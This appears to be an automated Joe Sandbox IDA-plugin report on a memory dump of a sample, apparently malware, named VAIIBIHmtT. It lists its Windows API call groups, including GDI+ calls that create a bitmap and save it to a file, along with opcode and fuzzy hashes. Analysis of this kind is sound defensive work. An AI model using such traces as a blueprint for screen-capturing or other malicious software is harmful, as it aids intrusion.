                                                        • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                        • String ID:
                                                        • API String ID: 1324828854-0
                                                        • Opcode ID: 104bec089efa8ddbbf106d3ba7b26555e8bb7f605cb6606e0c3875e27b37aebe
                                                        • Instruction ID: 3302cc5d055cfa7cb2d102f804d659735755d65fc8cb0b0a8ea62d8a9f37e22e
                                                        • Opcode Fuzzy Hash: 104bec089efa8ddbbf106d3ba7b26555e8bb7f605cb6606e0c3875e27b37aebe
                                                        • Instruction Fuzzy Hash: 1E51B3B09002499FCB10DFA8D845BEEBBF4EF09701F14412BE556E7391E7349A51CB69
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 26fd24188a083ade74c1b847c8e385b80c443176beafc5e0d5befa98fb89b42a
                                                        • Instruction ID: 44ae7d58254669835104620532439e4651bcdc670411f054606b0734315a2d03
                                                        • Opcode Fuzzy Hash: 26fd24188a083ade74c1b847c8e385b80c443176beafc5e0d5befa98fb89b42a
                                                        • Instruction Fuzzy Hash: B3112772A00215BFCB212FB3AC05E6B7A5CEF8A725F10063BF815D7240DA38890486A9
                                                        APIs
                                                          • Part of subcall function 0043A0EA: _free.LIBCMT ref: 0043A113
                                                        • _free.LIBCMT ref: 0043A3F1
                                                          • Part of subcall function 0043348A: HeapFree.KERNEL32(00000000,00000000,?,0043A118,?,00000000,?,00000000,?,0043A3BC,?,00000007,?,?,0043A7B0,?), ref: 004334A0
                                                          • Part of subcall function 0043348A: GetLastError.KERNEL32(?,?,0043A118,?,00000000,?,00000000,?,0043A3BC,?,00000007,?,?,0043A7B0,?,?), ref: 004334B2
                                                        • _free.LIBCMT ref: 0043A3FC
                                                        • _free.LIBCMT ref: 0043A407
                                                        • _free.LIBCMT ref: 0043A45B
                                                        • _free.LIBCMT ref: 0043A466
                                                        • _free.LIBCMT ref: 0043A471
                                                        • _free.LIBCMT ref: 0043A47C
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: _free$ErrorFreeHeapLast
                                                        • String ID:
                                                        • API String ID: 776569668-0
                                                        • Opcode ID: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
                                                        • Instruction ID: c6d5b65f25628cde0ea29edd4ff893f52e85bca0f905c5b3a1529a10dd86fb4b
                                                        • Opcode Fuzzy Hash: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
                                                        • Instruction Fuzzy Hash: 3311A232580B04A6D521BF72CC07FCB77AC6F2C306F40981EB6DA7A052CA6EB5105B46
                                                        APIs
                                                        • GetLogicalProcessorInformation.KERNEL32(00000000,?), ref: 00412420
                                                        • GetLastError.KERNEL32 ref: 00412426
                                                        • GetLogicalProcessorInformation.KERNEL32(00000000,?), ref: 00412453
                                                        • GetLastError.KERNEL32 ref: 0041245D
                                                        • GetLastError.KERNEL32 ref: 0041246F
                                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412485
                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00412493
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                        • String ID:
                                                        • API String ID: 4227777306-0
                                                        • Opcode ID: 98e3d6891a0dd5d677cbf2f779bc3de9b57089e9d4dcd81604344dd870270d4b
                                                        • Instruction ID: 772dfc6c110a2a8534dac99729108f53ec46fdbd0e11e7149f9ef709963b67bd
                                                        • Opcode Fuzzy Hash: 98e3d6891a0dd5d677cbf2f779bc3de9b57089e9d4dcd81604344dd870270d4b
                                                        • Instruction Fuzzy Hash: 56012B34A00125B7C720AF66ED09BEF376CEF42B52B60443BF805D2151DBACDA54866D
                                                        APIs
                                                        • GetLastError.KERNEL32(?,?,0042E005,00457910,00000010), ref: 00431EFE
                                                        • _free.LIBCMT ref: 00431F31
                                                        • _free.LIBCMT ref: 00431F59
                                                        • SetLastError.KERNEL32(00000000), ref: 00431F66
                                                        • SetLastError.KERNEL32(00000000), ref: 00431F72
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast$_free
                                                        • String ID: ('z
                                                        • API String ID: 3170660625-2735399949
                                                        • Opcode ID: 2b001732bfb1c4e8fc0cfaf3f440710dee5aae3afad35715c20867ef47a009af
                                                        • Instruction ID: 89f26f5adfa52999dd97e159cd61ed3cb5fd8874f2961931db20f525c950a72a
                                                        • Opcode Fuzzy Hash: 2b001732bfb1c4e8fc0cfaf3f440710dee5aae3afad35715c20867ef47a009af
                                                        • Instruction Fuzzy Hash: 0AF02D3A50CA0037D61637356C06B5F26199FD9B67F30212FF814923F2EF6D8806412D
                                                        APIs
                                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0042FEB5,00000003,?,0042FE55,00000003,00457970,0000000C,0042FFAC,00000003,00000002), ref: 0042FF24
                                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0042FF37
                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,0042FEB5,00000003,?,0042FE55,00000003,00457970,0000000C,0042FFAC,00000003,00000002,00000000), ref: 0042FF5A
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                        • String ID: 11@$CorExitProcess$mscoree.dll
                                                        • API String ID: 4061214504-3445089953
                                                        • Opcode ID: 565e8aad81c42c30b4556ccca566ef737f7629af4b303484cc6756d66643e6b5
                                                        • Instruction ID: b9f6d20b166e67f6b42c672312b3e089bcad04f0cb699fcb0f77a3f19f5d5cf1
                                                        • Opcode Fuzzy Hash: 565e8aad81c42c30b4556ccca566ef737f7629af4b303484cc6756d66643e6b5
                                                        • Instruction Fuzzy Hash: 09F0C834B00218BFDB109F50DD09B9EBFB4EF05B12F510076F805A2290CB799E44DA4C
                                                        APIs
                                                        • GetLastError.KERNEL32(?,?,00428DF1,00426782,004406C0,00000008,00440A25,?,?,?,?,00423A6B,?,?,F52E3FE0), ref: 00428E08
                                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00428E16
                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00428E2F
                                                        • SetLastError.KERNEL32(00000000,?,00428DF1,00426782,004406C0,00000008,00440A25,?,?,?,?,00423A6B,?,?,F52E3FE0), ref: 00428E81
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: ErrorLastValue___vcrt_
                                                        • String ID:
                                                        • API String ID: 3852720340-0
                                                        • Opcode ID: 099e375051b82bcc48573fb8fc2ff44709712d60ae6e1d6d5c512736a9c417fd
                                                        • Instruction ID: 13d4ce3fadb6930e01a7802674f608048713f2fc9b33e2444f23e675ffd4a1be
                                                        • Opcode Fuzzy Hash: 099e375051b82bcc48573fb8fc2ff44709712d60ae6e1d6d5c512736a9c417fd
                                                        • Instruction Fuzzy Hash: 7301D43230AB316EA6242BF67C8956F2744EB1577ABA1033FF510D12F1EE698C21954E
                                                        APIs
                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00404D88
                                                        • int.LIBCPMT ref: 00404D9F
                                                          • Part of subcall function 0040BD81: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD92
                                                          • Part of subcall function 0040BD81: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BDAC
                                                        • std::locale::_Getfacet.LIBCPMT ref: 00404DA8
                                                        • std::_Facet_Register.LIBCPMT ref: 00404DD9
                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00404DEF
                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00404E0D
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                        • String ID:
                                                        • API String ID: 2243866535-0
                                                        • Opcode ID: 4c2bec8a94d2dfe1f31f48f90f5228b8d61b4d632ca62fad144830f22e520e62
                                                        • Instruction ID: 4ef84c01712664b50a137fe66981e95a650a2e1b5a714d2619638ac2ebdb4e30
                                                        • Opcode Fuzzy Hash: 4c2bec8a94d2dfe1f31f48f90f5228b8d61b4d632ca62fad144830f22e520e62
                                                        • Instruction Fuzzy Hash: 9411A372D001189BCB15EBA5C841AEEB7B4AF54715F14017FE901BB2D2DB3C9A0587DC
                                                        APIs
                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0040C1BF
                                                        • int.LIBCPMT ref: 0040C1D6
                                                          • Part of subcall function 0040BD81: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD92
                                                          • Part of subcall function 0040BD81: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BDAC
                                                        • std::locale::_Getfacet.LIBCPMT ref: 0040C1DF
                                                        • std::_Facet_Register.LIBCPMT ref: 0040C210
                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 0040C226
                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0040C244
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                        • String ID:
                                                        • API String ID: 2243866535-0
                                                        • Opcode ID: 4e144f3e275808a570db40f1fcdaa1681d1240728c494bcfa96d4ea4c14bb240
                                                        • Instruction ID: 1719d9dd00d927231adb6862ad7e4c37149c3208904b64558a42dcf46f1f70c2
                                                        • Opcode Fuzzy Hash: 4e144f3e275808a570db40f1fcdaa1681d1240728c494bcfa96d4ea4c14bb240
                                                        • Instruction Fuzzy Hash: 2011A072D00228DBCB14EBA4D891AEDB774AF44314F14057EE401BB2D2DF3C9A0587D9
                                                        APIs
                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00405508
                                                        • int.LIBCPMT ref: 0040551F
                                                          • Part of subcall function 0040BD81: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD92
                                                          • Part of subcall function 0040BD81: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BDAC
                                                        • std::locale::_Getfacet.LIBCPMT ref: 00405528
                                                        • std::_Facet_Register.LIBCPMT ref: 00405559
                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 0040556F
                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0040558D
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                        • String ID:
                                                        • API String ID: 2243866535-0
                                                        • Opcode ID: e4ce11b37ce44f7ba8e9afc7401a0a9b198b24000e5175f43f23aaf661957535
                                                        • Instruction ID: 335d1a0449174c4850433ac7d89b0c6b75dcf3c5386a47d7b2396d3cdec16656
                                                        • Opcode Fuzzy Hash: e4ce11b37ce44f7ba8e9afc7401a0a9b198b24000e5175f43f23aaf661957535
                                                        • Instruction Fuzzy Hash: 5B117072D005289BCB15EBA4D841AEEB774EF44319F54013EE415BB2D2DB389E058B9C
                                                        APIs
                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 004055A4
                                                        • int.LIBCPMT ref: 004055BB
                                                          • Part of subcall function 0040BD81: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD92
                                                          • Part of subcall function 0040BD81: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BDAC
                                                        • std::locale::_Getfacet.LIBCPMT ref: 004055C4
                                                        • std::_Facet_Register.LIBCPMT ref: 004055F5
                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 0040560B
                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00405629
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                        • String ID:
                                                        • API String ID: 2243866535-0
                                                        • Opcode ID: 512af338323df7cd9b5461e6ba28ebb24eb4a9fd8b3f2c51b537379dd0adb521
                                                        • Instruction ID: 8e1419515e35d36fc68c9e18a3e27bb0650dc63e33415fac19ced33b622727b6
                                                        • Opcode Fuzzy Hash: 512af338323df7cd9b5461e6ba28ebb24eb4a9fd8b3f2c51b537379dd0adb521
                                                        • Instruction Fuzzy Hash: B911AC729006289BCF14EBA0C841AEEB360EF44319F14043FE811BB2D2DB389A058BDC
                                                        APIs
                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00404C4A
                                                        • int.LIBCPMT ref: 00404C61
                                                          • Part of subcall function 0040BD81: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD92
                                                          • Part of subcall function 0040BD81: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BDAC
                                                        • std::locale::_Getfacet.LIBCPMT ref: 00404C6A
                                                        • std::_Facet_Register.LIBCPMT ref: 00404C9B
                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00404CB1
                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00404CCF
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                        • String ID:
                                                        • API String ID: 2243866535-0
                                                        • Opcode ID: 80a228f69bd2cb3116441d1b51d3088f88c36febe04a249c7f41ad217ba583fd
                                                        • Instruction ID: 7f60e392e4a430ae1f2c93b626e46d5b6b74a1b844d6ec56694562dd50cc071c
                                                        • Opcode Fuzzy Hash: 80a228f69bd2cb3116441d1b51d3088f88c36febe04a249c7f41ad217ba583fd
                                                        • Instruction Fuzzy Hash: 6811A072D001289BCB14EBA0C841AEEB7B0AF84319F11003EE511BB2E2DB3C990487D8
                                                        APIs
                                                        • SetEvent.KERNEL32(?,00000000), ref: 00423759
                                                        • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00423741
                                                          • Part of subcall function 0041B74C: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 0041B76D
                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0042378A
                                                        • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 004237B3
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: Context$Event$Base::Concurrency::details::$ThrowTrace$Exception@8
                                                        • String ID: 11@
                                                        • API String ID: 2630251706-1785270423
                                                        • Opcode ID: 458ed3e5417ba220ed4bd1e4a28432a397d2c2fe66a31dff9dce91352e516156
                                                        • Instruction ID: 33ce48ef146ac78a3ef221314cc781bfd8a3c25b4f9a6e194e2960aa52b33145
                                                        • Opcode Fuzzy Hash: 458ed3e5417ba220ed4bd1e4a28432a397d2c2fe66a31dff9dce91352e516156
                                                        • Instruction Fuzzy Hash: 9C110B757002106BCF047F65DC85DAE7765EF84772B10416BFA05D7292CFAC9E41CA98
                                                        APIs
                                                        • Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 0041CE41
                                                        • Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 0041CE65
                                                        • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041CE78
                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0041CE86
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: Resource$Concurrency::details::Execution$CurrentException@8Manager::Proxy::RemoveSchedulerThreadThrowstd::invalid_argument::invalid_argument
                                                        • String ID: pScheduler
                                                        • API String ID: 3657713681-923244539
                                                        • Opcode ID: 9390b3195b713983fe10ad4c3c6d405898b6246382bfd66b9966ffe9dd40d037
                                                        • Instruction ID: 46b9ecfe0875f7f86596c353a9bffc422044863c42dab0ab2bac390bf5a45ba1
                                                        • Opcode Fuzzy Hash: 9390b3195b713983fe10ad4c3c6d405898b6246382bfd66b9966ffe9dd40d037
                                                        • Instruction Fuzzy Hash: 8FF0593594070863C324EB15DC828DEB3799E91728360812FE40563182CF3CAE8AC69D
                                                        APIs
                                                        • Concurrency::details::FreeThreadProxy::ReturnIdleProxy.LIBCONCRT ref: 0041E65F
                                                        • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041E672
                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0041E680
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: Concurrency::details::Exception@8FreeIdleProxyProxy::ReturnThreadThrowstd::invalid_argument::invalid_argument
                                                        • String ID: 11@$pContext
                                                        • API String ID: 1990795212-1086721755
                                                        • Opcode ID: a1f300e0f29ed94639b3e21e46aa6b462f5911b6182861392c7cf2f18a492d1f
                                                        • Instruction ID: 1f218d0b40ab772f1aed9042d58143e35ca4ab3a9892fa22be9c34d269449320
                                                        • Opcode Fuzzy Hash: a1f300e0f29ed94639b3e21e46aa6b462f5911b6182861392c7cf2f18a492d1f
                                                        • Instruction Fuzzy Hash: 45E06139B0011457CB04FB66DC06C5DB7A8AEC0B14750006FF901A3342DFB8A90585C8
                                                        APIs
                                                        • Concurrency::critical_section::unlock.LIBCMT ref: 00411EBC
                                                          • Part of subcall function 00411132: Concurrency::details::LockQueueNode::WaitForNextNode.LIBCMT ref: 00411153
                                                          • Part of subcall function 00411132: Concurrency::details::LockQueueNode::WaitForNextNode.LIBCMT ref: 0041118A
                                                          • Part of subcall function 00411132: Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 00411196
                                                        • Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 00411EC8
                                                          • Part of subcall function 00410AA3: Concurrency::critical_section::unlock.LIBCMT ref: 00410AC7
                                                        • Concurrency::Context::Block.LIBCONCRT ref: 00411ECD
                                                          • Part of subcall function 00412C81: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 00412C83
                                                        • Concurrency::critical_section::lock.LIBCONCRT ref: 00411EED
                                                          • Part of subcall function 0041105B: Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 00411069
                                                          • Part of subcall function 0041105B: Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 00411076
                                                          • Part of subcall function 0041105B: Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 00411081
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: Concurrency::details::LockQueue$NodeNode::$Concurrency::critical_section::_Concurrency::critical_section::unlockNextWait$Acquire_lockBase::BlockConcurrency::Concurrency::critical_section::lockConcurrency::details::_ContextContext::CurrentDerefLock::_ReaderSchedulerScoped_lockScoped_lock::~_Switch_to_activeTimerWriter
                                                        • String ID: 11@
                                                        • API String ID: 3659872527-1785270423
                                                        • Opcode ID: 82de0933dc6785f3946ddc0ad7c0081e97ef1b3c93ec0f171fb3e506e287e00c
                                                        • Instruction ID: 5f19519383477fd90e693e8c592c5b4d2a982a5ecb934fba7b69a42e3a353b75
                                                        • Opcode Fuzzy Hash: 82de0933dc6785f3946ddc0ad7c0081e97ef1b3c93ec0f171fb3e506e287e00c
                                                        • Instruction Fuzzy Hash: E8E0D8355005029BCB04FF21C5614DCFB617F44354B10825EE466432E1CF785D86CB88
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7096e54c8b2da2135de54d2c532f2528a1a3733c17ca5e9eea5bc4f64eff24f9
                                                        • Instruction ID: 7eacffcc392e6897453e427a1bc5d3d4951d53cce7b4b374ddd0667b65be5727
                                                        • Opcode Fuzzy Hash: 7096e54c8b2da2135de54d2c532f2528a1a3733c17ca5e9eea5bc4f64eff24f9
                                                        • Instruction Fuzzy Hash: FF718E31B00266DBCB21CF95E884ABFBB75EF45360FA8426BE81057280D7789D41C7E9
                                                        APIs
                                                          • Part of subcall function 004336C7: RtlAllocateHeap.NTDLL(00000000,0040D895,00000000,?,004267BE,00000002,00000000,00000000,00000000,?,0040CD46,0040D895,00000004,00000000,00000000,00000000), ref: 004336F9
                                                        • _free.LIBCMT ref: 00430B6F
                                                        • _free.LIBCMT ref: 00430B86
                                                        • _free.LIBCMT ref: 00430BA5
                                                        • _free.LIBCMT ref: 00430BC0
                                                        • _free.LIBCMT ref: 00430BD7
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: _free$AllocateHeap
                                                        • String ID:
                                                        • API String ID: 3033488037-0
                                                        • Opcode ID: c373ba6c443c71e4ab428eca93eb82442dc6f2775a0feb0437eab9ebf47d5f4f
                                                        • Instruction ID: b3708cb7fd5f7c05c7b70e76ebc142bc523ed94c66de99b1f2255d1376b2cc69
                                                        • Opcode Fuzzy Hash: c373ba6c443c71e4ab428eca93eb82442dc6f2775a0feb0437eab9ebf47d5f4f
                                                        • Instruction Fuzzy Hash: BD51DF31A00304ABDB21DF6AC851A6BB7F4EF58724F14566EE809DB250E739A901CB48
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: _free
                                                        • String ID:
                                                        APIs
                                                        • MultiByteToWideChar.KERNEL32(?,00000000,23E85006,0042D11A,00000000,00000000,0042D958,?,0042D958,?,00000001,0042D11A,23E85006,00000001,0042D958,0042D958), ref: 0043690A
                                                        • __alloca_probe_16.LIBCMT ref: 00436942
                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00436993
                                                        • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 004369A5
                                                        • __freea.LIBCMT ref: 004369AE
                                                          • Part of subcall function 004336C7: RtlAllocateHeap.NTDLL(00000000,0040D895,00000000,?,004267BE,00000002,00000000,00000000,00000000,?,0040CD46,0040D895,00000004,00000000,00000000,00000000), ref: 004336F9
                                                        Similarity
                                                        • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                        • String ID:
                                                        APIs
                                                        • _SpinWait.LIBCONCRT ref: 0041AF0B
                                                          • Part of subcall function 00410F41: _SpinWait.LIBCONCRT ref: 00410F59
                                                        • Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 0041AF1F
                                                        • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 0041AF51
                                                        • List.LIBCMT ref: 0041AFD4
                                                        • List.LIBCMT ref: 0041AFE3
                                                        Similarity
                                                        • API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
                                                        • String ID:
                                                        APIs
                                                        • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00402086
                                                        • GdipAlloc.GDIPLUS(00000010), ref: 0040208E
                                                        • GdipCreateBitmapFromHBITMAP.GDIPLUS(?,00000000,?), ref: 004020A9
                                                        • GdipSaveImageToFile.GDIPLUS(?,?,?,00000000), ref: 004020D3
                                                        • GdiplusShutdown.GDIPLUS(?), ref: 004020FF
                                                        Similarity
                                                        • API ID: Gdip$Gdiplus$AllocBitmapCreateFileFromImageSaveShutdownStartup
                                                        • String ID:
                                                        APIs
                                                          • Part of subcall function 0041275D: TlsGetValue.KERNEL32(?,?,00410B7B,00412C88,00000000,?,00410B59,?,?,?,00000000,?,00000000), ref: 00412763
                                                        • Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 0041796A
                                                          • Part of subcall function 00420FD3: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 00420FFA
                                                          • Part of subcall function 00420FD3: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 00421013
                                                          • Part of subcall function 00420FD3: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 00421089
                                                          • Part of subcall function 00420FD3: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 00421091
                                                        • Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 00417978
                                                        • Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 00417982
                                                        • Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 0041798C
                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 004179AA
                                                        Similarity
                                                        • API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredException@8ExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceThrowValueVirtualWork
                                                        • String ID:
                                                        APIs
                                                        • _free.LIBCMT ref: 00439E7D
                                                          • Part of subcall function 0043348A: HeapFree.KERNEL32(00000000,00000000,?,0043A118,?,00000000,?,00000000,?,0043A3BC,?,00000007,?,?,0043A7B0,?), ref: 004334A0
                                                          • Part of subcall function 0043348A: GetLastError.KERNEL32(?,?,0043A118,?,00000000,?,00000000,?,0043A3BC,?,00000007,?,?,0043A7B0,?,?), ref: 004334B2
                                                        • _free.LIBCMT ref: 00439E8F
                                                        • _free.LIBCMT ref: 00439EA1
                                                        • _free.LIBCMT ref: 00439EB3
                                                        • _free.LIBCMT ref: 00439EC5
                                                        Similarity
                                                        • API ID: _free$ErrorFreeHeapLast
                                                        • String ID:
                                                        APIs
                                                        • _free.LIBCMT ref: 00431768
                                                          • Part of subcall function 0043348A: HeapFree.KERNEL32(00000000,00000000,?,0043A118,?,00000000,?,00000000,?,0043A3BC,?,00000007,?,?,0043A7B0,?), ref: 004334A0
